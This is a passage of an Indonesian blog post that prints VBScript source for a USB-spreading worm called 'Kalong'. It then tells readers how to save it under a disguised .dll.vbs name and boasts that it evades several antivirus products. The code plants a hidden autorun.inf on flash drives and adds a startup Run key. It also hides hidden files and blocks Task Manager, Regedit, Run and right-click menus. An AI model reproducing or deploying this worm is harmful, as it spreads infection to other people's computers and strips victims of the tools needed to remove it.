=fs.getfile(flashdrive.path &”\autorun.inf”)tf.attributes = 32set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)tf.write isitf.closeset tf = fs.getfile(flashdrive.path &”\autorun.inf”)tf.attributes=39end ifnext‘//–Manipulasi Registry–//set kalong = createobject(”WScript.Shell”)‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0?, “REG_DWORD”‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1?, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD”‘//–Manip – Disable klik kanan–//kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD”‘//–Manip - Munculkan Pesan Setiap Windows Startup–//kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”‘//–Manip – Aktif setiap Windows Startup–//kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “‘//–Manip – Ubah RegisteredOwner dan Organization–//kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//if check 1 thenWscript.sleep 200000end ifloop while check 1set sd = createobject(”Wscript.shell”)sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname‘Akhir dari KodeSave code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

0 komentar:

Diberdayakan oleh Blogger.

Pengikut

Ads Fundi

adscamp